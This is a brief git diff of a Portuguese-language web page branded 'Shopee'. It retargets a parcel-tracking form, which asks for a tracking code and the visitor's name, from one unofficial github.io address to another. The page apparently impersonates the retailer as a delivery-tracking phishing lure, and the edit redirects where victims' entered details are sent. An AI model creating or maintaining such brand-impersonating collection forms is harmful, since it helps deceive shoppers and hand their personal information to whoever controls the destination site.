--- a/index.html
+++ b/index.html
@@ -34,7 +34,7 @@
         </header>
             <section id="page">
                 <h2>Shopee</h2>
-                <form id="form" action="https://shopeebr.github.io/.com/">
+                <form id="form" action="https://shopeeenvios.github.io/.com.br/">
                     <input type="text" id="name" class="form-control" name="name" placeholder="Codigo de rastreio" required/>
                      <input type="text" id="email" name="email" class="form-control" placeholder="Seu nome" required/>
                      <button type="submit" id="submit" class="submit-button">verificar local do produto</button>
